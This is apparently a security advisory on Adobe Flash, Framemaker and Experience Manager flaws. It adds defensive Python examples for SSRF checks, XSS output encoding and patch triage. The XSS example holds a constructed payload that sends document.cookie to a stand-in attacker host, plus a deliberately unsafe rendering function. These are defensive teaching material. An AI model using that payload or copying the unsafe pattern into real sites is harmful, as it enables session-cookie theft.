Severity Rating: HIGH
Software Affected
Adobe Flash Player Desktop Runtime Version 32.0.0.371 and earlier
Adobe Flash Player for Google Chrome Version 32.0.0.371 and earlier
Adobe Flash Player for Microsoft Edge and Internet Explorer 11 Version
32.0.0.330 and earlier
Adobe Framemaker Version 2019.0.5 and earlier
Adobe Experience Manager Version 6.5 and earlier
Overview
Multiple vulnerabilities have been reported in Adobe products which could
allow a remote attacker to obtain sensitive information, conduct cross-site
scripting attacks, or execute arbitrary code on the targeted system.
Description
1. Use-After-Free Vulnerability (CVE-2020-9633)
A use-after-free vulnerability exists in Adobe Flash Player.
Successful exploitation of this vulnerability could allow the attacker to
execute arbitrary code on the targeted system in the context of the current
user.
2. Memory Corruption Vulnerability (CVE-2020-9636)
A memory corruption vulnerability exists in Adobe Framemaker. A remote
attacker could exploit this vulnerability by persuading a victim to open a
specially-crafted document.
Successful exploitation of this vulnerability could allow the attacker to
execute arbitrary code on the targeted system or cause the application to
crash.
3. Out-of-Bounds Write Vulnerabilities (CVE-2020-9634, CVE-2020-9635)
These vulnerabilities exist in Adobe Framemaker due to out-of-bounds write
errors. A remote attacker could exploit these vulnerabilities by persuading a
victim to open a specially-crafted document.
Successful exploitation of these vulnerabilities could allow the attacker to
execute arbitrary code on the targeted system or cause the application to
crash.
4. Server-Side Request Forgery (SSRF) Vulnerabilities (CVE-2020-9643,
CVE-2020-9645)
These vulnerabilities exist in Adobe Experience Manager (AEM) because the
server can be induced to issue requests to attacker-chosen destinations. A
remote attacker could exploit these vulnerabilities by sending a crafted
request to the affected server.
Successful exploitation of these vulnerabilities could allow the attacker to
obtain sensitive information from the targeted system.
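The SSRF items above describe the class, not the AEM-specific flaw. As an added illustration (not AEM code, not part of this advisory) of the check that closes the class, the function below validates a user-supplied fetch destination before a server-side request is made: scheme and host allowlists, no userinfo, restricted ports, and a resolution step that refuses any name resolving to a non-public address. ALLOWED_HOSTS and the resolver answers are hypothetical.

```python
"""SSRF destination check, added here as an illustration (not AEM code).

Assumptions: the application fetches a user-supplied URL server-side;
ALLOWED_HOSTS is a hypothetical allowlist of fetch targets; `resolve` is
injectable so the check can run without network access.
"""
import ipaddress
import socket
from typing import Callable, List, Tuple
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_HOSTS = {"cdn.example.com", "api.example.com"}   # hypothetical allowlist
ALLOWED_PORTS = {None, 80, 443}


def is_public_ip(ip: str) -> bool:
    """True only for globally routable unicast addresses (v4 or v6)."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return not (addr.is_private or addr.is_loopback or addr.is_link_local
                or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def resolve_hostnames(host: str) -> List[str]:
    """Default resolver: every address the name resolves to, v4 and v6."""
    try:
        infos = socket.getaddrinfo(host, None)
    except socket.gaierror:
        return []
    return sorted({info[4][0] for info in infos})


def validate_destination(url: str,
                         resolve: Callable[[str], List[str]] = resolve_hostnames
                         ) -> Tuple[bool, str]:
    """Return (ok, detail). On success `detail` is the IP to connect to.

    Connect to that pinned IP (with the Host header set to the hostname)
    rather than re-resolving, so a DNS answer that changes between this
    check and the fetch (DNS rebinding) cannot redirect the request.
    """
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme not allowed: {parts.scheme!r}"
    if parts.username is not None or parts.password is not None:
        return False, "userinfo in URL (user@host confusion)"
    host = (parts.hostname or "").lower().rstrip(".")
    if host not in ALLOWED_HOSTS:
        return False, f"host not in allowlist: {host!r}"
    try:
        port = parts.port
    except ValueError:
        return False, "malformed port"
    if port not in ALLOWED_PORTS:
        return False, f"port not allowed: {port}"
    ips = resolve(host)
    if not ips:
        return False, "hostname did not resolve"
    internal = [ip for ip in ips if not is_public_ip(ip)]
    if internal:
        # An allowlisted name pointing at an internal address is still a
        # path to internal services; refuse rather than trust the name.
        return False, f"resolves to non-public address(es): {internal}"
    return True, ips[0]
```

The allowlist is the primary control; the resolution check and IP pinning exist because an allowlisted name can be repointed at a loopback, link-local (cloud metadata) or RFC 1918 address. Note that Python's `ipaddress` classifies the TEST-NET documentation ranges as private, so real deployments should test with the addresses they actually serve.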
5. Cross-Site Scripting (DOM-based) Vulnerability (CVE-2020-9647)
This vulnerability exists in Adobe Experience Manager (AEM) due to improper
validation of user-supplied input. A remote attacker could exploit this
vulnerability by injecting malicious script into a Web page.
Successful exploitation of this vulnerability could allow the attacker to
steal the cookie-based authentication credentials on the targeted system.
6. Cross-Site Scripting Vulnerabilities (CVE-2020-9648, CVE-2020-9651)
These vulnerabilities exist in Adobe Experience Manager (AEM) due to improper
validation of user-supplied input. A remote attacker could exploit these
vulnerabilities by persuading a victim to visit a specially-crafted URL.
Successful exploitation of these vulnerabilities could allow the attacker to
steal the cookie-based authentication credentials on the targeted system.
7. Cross-Site Scripting (Stored) Vulnerability (CVE-2020-9644)
This vulnerability exists in Adobe Experience Manager (AEM) due to improper
validation of user-supplied input. A remote attacker could exploit this
vulnerability by injecting malicious script into a Web page.
Successful exploitation of this vulnerability could allow the attacker to
steal the cookie-based authentication credentials on the targeted system.
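Items 5, 6 and 7 share one root cause: user-supplied input reaches a page without being encoded for the context it lands in. Input validation on its own does not close that, because a value that is harmless in one context (a URL) is executable in another (an href). The following is an added, generic illustration of the fix class, not AEM code and not part of this advisory: the vulnerable concatenation pattern beside a version that encodes each value for its context, exercised with a constructed cookie-theft payload of the kind the impact statements above refer to. The function and allowlist names are hypothetical.

```python
"""Context-aware output encoding, added as a generic illustration of the XSS
fix class (not AEM code). All names below are hypothetical.
"""
import html
from urllib.parse import quote

# Hypothetical allowlist: only these URL forms may appear in an href.
SAFE_HREF_PREFIXES = ("http://", "https://", "mailto:", "/")


def for_html(value: str) -> str:
    """HTML body or double-quoted attribute: escape & < > \" and '."""
    return html.escape(value, quote=True)


def for_url_param(value: str) -> str:
    """Value embedded inside a query string: percent-encode everything unsafe."""
    return quote(value, safe="")


def for_href(value: str) -> str:
    """Whole URL in an href: allowlist the scheme, then HTML-escape.

    Escaping alone leaves 'javascript:alert(document.cookie)' intact because
    it contains no HTML metacharacters; the scheme allowlist is what stops it.
    """
    candidate = value.strip()
    low = candidate.lower()
    if "\\" in candidate or low.startswith("//"):
        return "#"   # backslash tricks and protocol-relative URLs leave the site
    if not low.startswith(SAFE_HREF_PREFIXES):
        return "#"   # inert fallback for javascript:, data:, vbscript: and friends
    return html.escape(candidate, quote=True)


def render_profile_unsafe(display_name: str, homepage: str, search_term: str) -> str:
    """The vulnerable pattern: raw concatenation of user input into markup."""
    return (f"<p>Hello, {display_name}</p>"
            f'<a href="{homepage}">home</a>'
            f'<a href="/search?q={search_term}">search again</a>')


def render_profile(display_name: str, homepage: str, search_term: str) -> str:
    """Same page, each value encoded for the context it lands in."""
    return (f"<p>Hello, {for_html(display_name)}</p>"
            f'<a href="{for_href(homepage)}">home</a>'
            f'<a href="/search?q={for_url_param(search_term)}">search again</a>')


# Constructed payload: breaks out of an attribute and sends document.cookie
# to an attacker-controlled host (attacker.invalid is a reserved, non-routable name).
COOKIE_THEFT = ('"><script>new Image().src="https://attacker.invalid/?c="'
                '+document.cookie</script>')

if __name__ == "__main__":
    print(render_profile_unsafe(COOKIE_THEFT, "javascript:alert(document.cookie)", COOKIE_THEFT))
    print(render_profile(COOKIE_THEFT, "javascript:alert(document.cookie)", COOKIE_THEFT))
```

Separately from the encoding fix, marking the session cookie HttpOnly keeps it out of `document.cookie`, which removes the specific impact named above (credential theft by injected script) even where an XSS bug remains; it does not stop the script from acting on the user's behalf within the page.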
Solution
Update to the latest versions as available at the following URLs:
https://helpx.adobe.com/security/products/flash-player/apsb20-30.html
https://helpx.adobe.com/security/products/framemaker/apsb20-32.html
https://helpx.adobe.com/security/products/experience-manager/apsb20-31.html
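To turn the "Software Affected" list into an action list, the script below (an added example, not Adobe or CERT-In tooling) compares an asset inventory against the version ceilings stated in this advisory and returns the rows that need the update. The inventory rows are constructed. Because the advisory gives AEM only as "6.5 and earlier" with no service-pack level, the comparison is deliberately conservative: a version is compared only to the precision the ceiling has, so every 6.5.x install is flagged and must be settled against the vendor bulletin, which states the exact fixed level.

```python
"""Triage an asset inventory against the affected versions listed in this
advisory. Added example (not Adobe or CERT-In tooling); inventory data is
constructed.
"""
import re
from typing import List, Tuple

# Ceilings taken from the "Software Affected" section: a version at or
# below the ceiling is affected.
AFFECTED_CEILING = {
    "Adobe Flash Player Desktop Runtime": "32.0.0.371",
    "Adobe Flash Player for Google Chrome": "32.0.0.371",
    "Adobe Flash Player for Microsoft Edge and Internet Explorer 11": "32.0.0.330",
    "Adobe Framemaker": "2019.0.5",
    "Adobe Experience Manager": "6.5",
}


def parse_version(text: str) -> Tuple[int, ...]:
    """'32.0.0.371' -> (32, 0, 0, 371). Non-numeric noise is ignored."""
    parts = re.findall(r"\d+", text)
    if not parts:
        raise ValueError(f"no numeric version in {text!r}")
    return tuple(int(p) for p in parts)


def is_affected(product: str, version: str) -> bool:
    """Compare only as many components as the advisory's ceiling has.

    Conservative by design: for AEM the ceiling is just "6.5", so 6.5.x is
    flagged and the vendor bulletin decides whether that service-pack level
    is fixed.
    """
    ceiling = parse_version(AFFECTED_CEILING[product])
    installed = parse_version(version)[: len(ceiling)]
    installed += (0,) * (len(ceiling) - len(installed))   # 6.5 == 6.5.0
    return installed <= ceiling


def triage(inventory: List[Tuple[str, str, str]]) -> List[Tuple[str, str, str]]:
    """Return the (host, product, version) rows that need the update."""
    return [(host, product, version) for host, product, version in inventory
            if product in AFFECTED_CEILING and is_affected(product, version)]


# Constructed sample inventory; hosts and versions are illustrative only.
SAMPLE_INVENTORY = [
    ("ws-01", "Adobe Flash Player Desktop Runtime", "32.0.0.371"),
    ("ws-02", "Adobe Flash Player for Google Chrome", "32.0.0.400"),
    ("ws-03", "Adobe Framemaker", "2019.0.5"),
    ("web-01", "Adobe Experience Manager", "6.5.2"),
    ("ws-04", "Some Other Product", "1.0"),
]

if __name__ == "__main__":
    for row in triage(SAMPLE_INVENTORY):
        print("UPDATE NEEDED:", *row)
```

Note the two Flash Player ceilings differ (32.0.0.371 for the desktop and Chrome builds, 32.0.0.330 for the Edge/IE11 build), so the product name, not just "Flash Player", must be carried in the inventory.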
Vendor Information
Adobe
https://helpx.adobe.com/security/products/flash-player/apsb20-30.html
https://helpx.adobe.com/security/products/framemaker/apsb20-32.html
https://helpx.adobe.com/security/products/experience-manager/apsb20-31.html
References
Adobe
https://helpx.adobe.com/security/products/flash-player/apsb20-30.html
https://helpx.adobe.com/security/products/framemaker/apsb20-32.html
https://helpx.adobe.com/security/products/experience-manager/apsb20-31.html
CVE Name
CVE-2020-9633
CVE-2020-9636
CVE-2020-9634
CVE-2020-9635
CVE-2020-9643
CVE-2020-9645
CVE-2020-9647
CVE-2020-9648
CVE-2020-9651
CVE-2020-9644
About Cert Advisory
We have created this blog to provide the latest security advisories from CERT-In on security vulnerabilities, threats, attacks and the patching required to mitigate any kind of cyber attack.